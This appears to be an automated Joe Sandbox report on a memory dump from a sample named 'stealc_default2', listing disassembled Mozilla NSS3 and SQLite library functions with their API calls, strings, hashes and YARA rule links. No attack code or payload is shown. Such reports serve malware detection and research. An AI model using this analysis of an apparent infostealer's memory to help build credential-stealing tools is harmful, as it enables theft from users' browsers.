API String ID: 2524771861-0
Opcode ID: 9ff4e5a2762ae603cfa15a2d0349842cf6120956f507281c0de113e2f4a47927
Instruction ID: e2e4b65d9b3826683f214c2073853256deab0a15d9fbf825ea20e85311a6b637
Opcode Fuzzy Hash: 9ff4e5a2762ae603cfa15a2d0349842cf6120956f507281c0de113e2f4a47927
Instruction Fuzzy Hash: B981A475A00219AFDF10DFA8DD81BDEBBB5BF19318F150424E919A3711E731E924CBA1

Function 6C8A4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C8A4D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C8A4D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C8A4DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8A4E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C8A4E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C8A4E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C8A4E85
DER_Encode_Util.NSS3(?,?,6C9F05A4,00000000), ref: 6C8A4EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C8A4F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C8A4F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8A4F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C8A4F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C8A4F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8A4FC8

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 8e5240da370ba58c09b514fe922d46a40402539a0cb1165a16f98e0cb2898f0f
Instruction ID: 129c42efdd9f4d6996750808826c8c74079f93234ad5529347c86510c906f0ba
Opcode Fuzzy Hash: 8e5240da370ba58c09b514fe922d46a40402539a0cb1165a16f98e0cb2898f0f
Instruction Fuzzy Hash: 7E81A4715043019FEB21CF68DA40B5BB7E4ABC8358F14AD2DF958CB641EB31E906CB92

Function 6C8E5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C8E5C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C8E5CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C8E5CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C8E5D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C8E5D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8E5D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C8E5E18
TlsGetValue.KERNEL32 ref: 6C8E5E5E
EnterCriticalSection.KERNEL32(?), ref: 6C8E5E72
PR_Unlock.NSS3(?), ref: 6C8E5E8B

Part of subcall function 6C8DF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C8DF854
Part of subcall function 6C8DF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C8DF868
Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C8DF882
Part of subcall function 6C8DF820: free.MOZGLUE(04C483FF,?,?), ref: 6C8DF889
Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C8DF8A4
Part of subcall function 6C8DF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C8DF8AB
Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C8DF8C9
Part of subcall function 6C8DF820: free.MOZGLUE(280F10EC,?,?), ref: 6C8DF8D0

Strings

tokens=[0x%x=<%s>], xrefs: 6C8E5D3D
d, xrefs: 6C8E5C36

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 7dcded8ab50f95f85c8bb2fe5649b8af7b6fdec409a21d55585ca1c861440c13
Instruction ID: ea691a21ecdbeb842392894c7b42ccc9fc61ef371d871b364aa78ba31fdfa3d9
Opcode Fuzzy Hash: 7dcded8ab50f95f85c8bb2fe5649b8af7b6fdec409a21d55585ca1c861440c13
Instruction Fuzzy Hash: 5B7107B0E043159BEB209F28EE4576E3375AF5B31DF140835DC099AB42EB32E915C792

Function 6C8D6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C8D781D,00000000,6C8CBE2C,?,6C8D6B1D,?,?,?,?,00000000,00000000,6C8D781D), ref: 6C8D6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C8D781D,?,6C8CBE2C,?), ref: 6C8D6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C8D781D), ref: 6C8D6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C8D6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C8D6C96

Part of subcall function 6C881240: TlsGetValue.KERNEL32(00000040,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881267
Part of subcall function 6C881240: EnterCriticalSection.KERNEL32(?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C88127C
Part of subcall function 6C881240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881291
Part of subcall function 6C881240: PR_Unlock.NSS3(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C8812A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C8D6CAA

Strings

rdb:, xrefs: 6C8D6C69
NSS_DEFAULT_DB_TYPE, xrefs: 6C8D6C91
extern:, xrefs: 6C8D6C7E
dbm, xrefs: 6C8D6CA4
sql:, xrefs: 6C8D6C52
dbm:, xrefs: 6C8D6C3A

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 81abf078affb6276451c661f32e8b5a5826f09adf7769a2deb7fef7f9e0414b8
Instruction ID: b19a9be97b53ee1ca80696d003922c1329f595160b16b1408d137491829b4228
Opcode Fuzzy Hash: 81abf078affb6276451c661f32e8b5a5826f09adf7769a2deb7fef7f9e0414b8
Instruction Fuzzy Hash: A301F2A170670523E7702B7D6E4AF32390C9F81558F2A0C35FE18F0981FBA2FA1841A5

Function 6C88ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C88ACE2
malloc.MOZGLUE(00000001), ref: 6C88ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C88AD02
TlsGetValue.KERNEL32 ref: 6C88AD3C
calloc.MOZGLUE(00000001,?), ref: 6C88AD8C
PR_Unlock.NSS3 ref: 6C88ADC0
free.MOZGLUE(00000000), ref: 6C88AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C88AE58
free.MOZGLUE(00000000), ref: 6C88AE69
free.MOZGLUE(?), ref: 6C88AE78
PR_Unlock.NSS3 ref: 6C88AE8C
free.MOZGLUE(?), ref: 6C88AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C88AEC7

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 741dd1f6d911f782fb8d3e3a7f54a28d7730f198c747d95a1f09f2beb6b5dc62
Instruction ID: 689b906bb07b9e05bfa12c829a4723a12e36d37f8a01bc63c77534f18dcae9a6
Opcode Fuzzy Hash: 741dd1f6d911f782fb8d3e3a7f54a28d7730f198c747d95a1f09f2beb6b5dc62
Instruction Fuzzy Hash: 8851A2B1A0611A9BDF20DF98EA416AE7774BF1A349F240925D814A7FC0D331E915CBE2

Function 6C964C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C964CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C964CFD
sqlite3_value_text16.NSS3(?), ref: 6C964D44

Strings

out of memory, xrefs: 6C964C78, 6C964C9E
abort due to ROLLBACK, xrefs: 6C964D27, 6C964D33
unknown error, xrefs: 6C964D56
API call with %s database connection pointer, xrefs: 6C964CF6
invalid, xrefs: 6C964CF1
bad parameter or other API misuse, xrefs: 6C964D05
no more rows available, xrefs: 6C964D2E
another row available, xrefs: 6C964D20

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 13a4149ab25771d72c46e68350cf5795ee8f97a0f3a17252e28f6b9fc54d1ea3
Instruction ID: 556c4908a4f91a4f3b7070f03b51c76eeb951999fb1bec13936681c5e7622c87
Opcode Fuzzy Hash: 13a4149ab25771d72c46e68350cf5795ee8f97a0f3a17252e28f6b9fc54d1ea3
Instruction Fuzzy Hash: 70312572E08911ABF718C6AAE8317E573697B8231CF250525D4244BFD8C729F8628FD7

Function 6C962D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C962D9F

Part of subcall function 6C81CA30: EnterCriticalSection.KERNEL32(?,?,?,6C87F9C9,?,6C87F4DA,6C87F9C9,?,?,6C84369A), ref: 6C81CA7A
Part of subcall function 6C81CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C81CB26

sqlite3_exec.NSS3(?,?,6C962F70,?,?), ref: 6C962DF9
sqlite3_free.NSS3(00000000), ref: 6C962E2C
sqlite3_free.NSS3(?), ref: 6C962E3A
sqlite3_free.NSS3(?), ref: 6C962E52
sqlite3_mprintf.NSS3(6C9CAAF9,?), ref: 6C962E62
sqlite3_free.NSS3(?), ref: 6C962E70
sqlite3_free.NSS3(?), ref: 6C962E89
sqlite3_free.NSS3(?), ref: 6C962EBB
sqlite3_free.NSS3(?), ref: 6C962ECB
sqlite3_free.NSS3(00000000), ref: 6C962F3E
sqlite3_free.NSS3(?), ref: 6C962F4C

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: bbcdb398e4dc26a07889d45bdf9bc70bfad455d8375b30cafb1fdf78a616bba3
Instruction ID: 969cf0e5d8ca71137059a21e1f9e6a336f0716cf14024fe2c65dc66ee6515a1a
Opcode Fuzzy Hash: bbcdb398e4dc26a07889d45bdf9bc70bfad455d8375b30cafb1fdf78a616bba3
Instruction Fuzzy Hash: 0A61ADB5E046068BEB11CFAAD884B9EB7F5EF58348F104434DC15ABB81E735E854CBA1

Function 6C8B2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C8B3F23,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2C62
EnterCriticalSection.KERNEL32(0000001C,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2C76
PL_HashTableLookup.NSS3(00000000,?,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2C93

Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23), ref: 6C8B2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?), ref: 6C8B2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?), ref: 6C8B2D4D
EnterCriticalSection.KERNEL32(?), ref: 6C8B2D61
PL_HashTableLookup.NSS3(?,?), ref: 6C8B2D71
PR_Unlock.NSS3(?), ref: 6C8B2D7E

Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807AD
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807CD
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807D6
Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C81204A), ref: 6C8807E4
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,6C81204A), ref: 6C880864
Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C880880
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,6C81204A), ref: 6C8808CB
Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808D7
Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808FB

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 783339fda9f41b9f45bc85a66f91c5dc9535fb8ccc631f49a125ae00a6219490
Instruction ID: 749d0d208ac6bbb764c960378b63e1e8db52c05694659e7f0df75f1daabf0f85
Opcode Fuzzy Hash: 783339fda9f41b9f45bc85a66f91c5dc9535fb8ccc631f49a125ae00a6219490
Instruction Fuzzy Hash: 7951E6B6D00204ABDB20AF28ED458AA7774BF19358B188930EC18A7B11E731FD64C7E1

Function 6C8A7C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C9F2120,Function_00097E60,00000000,?,?,?,?,6C92067D,6C921C60,00000000), ref: 6C8A7C81

Part of subcall function 6C814C70: TlsGetValue.KERNEL32(?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814C97
Part of subcall function 6C814C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CB0
Part of subcall function 6C814C70: PR_Unlock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CC9

TlsGetValue.KERNEL32 ref: 6C8A7CA0
EnterCriticalSection.KERNEL32(?), ref: 6C8A7CB4
PR_Unlock.NSS3 ref: 6C8A7CCF

Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4

TlsGetValue.KERNEL32 ref: 6C8A7D04
EnterCriticalSection.KERNEL32(?), ref: 6C8A7D1B
realloc.MOZGLUE(-00000050), ref: 6C8A7D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8A7DF4
PR_Unlock.NSS3 ref: 6C8A7E0E

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: dcab699591accb660ddd03b5dd5f92a470cb72e0b8d540d7b828fdc0a268e0e0
Instruction ID: 1bf8afdc6bfe9e1be34e371e31a778186a8ef4e606ca63d6862c2a1575a87d9d
Opcode Fuzzy Hash: dcab699591accb660ddd03b5dd5f92a470cb72e0b8d540d7b828fdc0a268e0e0
Instruction Fuzzy Hash: 12514571B091409FDF206F68ED44B657BB1EF52319F354929ED1487B19EB30D962CB80

Function 6C814C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CB0
PR_Unlock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814D97
PR_Lock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814DBA
PR_WaitCondVar.NSS3 ref: 6C814DD4
PR_Unlock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814DEF

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 7522fda965ffefa784beb7b21c396cba5b0d065f2ca42839e5e1ba90c2aef8f1
Instruction ID: 2ba51c95e4c6dab9cd7fe0f42fd05ade5ab3b4deee25af9a6029efc5baa5d9f3
Opcode Fuzzy Hash: 7522fda965ffefa784beb7b21c396cba5b0d065f2ca42839e5e1ba90c2aef8f1
Instruction Fuzzy Hash: 65418FB1A1C616CFCB20AF79E18455D7BF4BF86318F164A69D89897B00E730D885CBC1

Function 6C9A7CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C9A7CE0

Part of subcall function 6C959BF0: TlsGetValue.KERNEL32(?,?,?,6C9A0A75), ref: 6C959C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A7D36
PR_Realloc.NSS3(?,00000080), ref: 6C9A7D6D
PR_GetCurrentThread.NSS3 ref: 6C9A7D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C9A7DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A7DD8
malloc.MOZGLUE(00000080), ref: 6C9A7DF8
PR_GetCurrentThread.NSS3 ref: 6C9A7E06

Strings

NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6C9A7DF0
:%s:%d:0x%lx, xrefs: 6C9A7DB9

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: cea2b9b0ad1a617cbe78403ea4e179f1198078deb24c557d83c469bc41374a50
Instruction ID: 642230d6f3398f9651d925b5a86df6c6289f8181ea7142dce6558ad3db57b680
Opcode Fuzzy Hash: cea2b9b0ad1a617cbe78403ea4e179f1198078deb24c557d83c469bc41374a50
Instruction Fuzzy Hash: 2741E7B1A00201AFDB04CF68CC81D7B3BBAFF95318B25456DE8198BB55D731E852CBA1

Function 6C9A7E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A7E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C9A7E46

Part of subcall function 6C881240: TlsGetValue.KERNEL32(00000040,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881267
Part of subcall function 6C881240: EnterCriticalSection.KERNEL32(?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C88127C
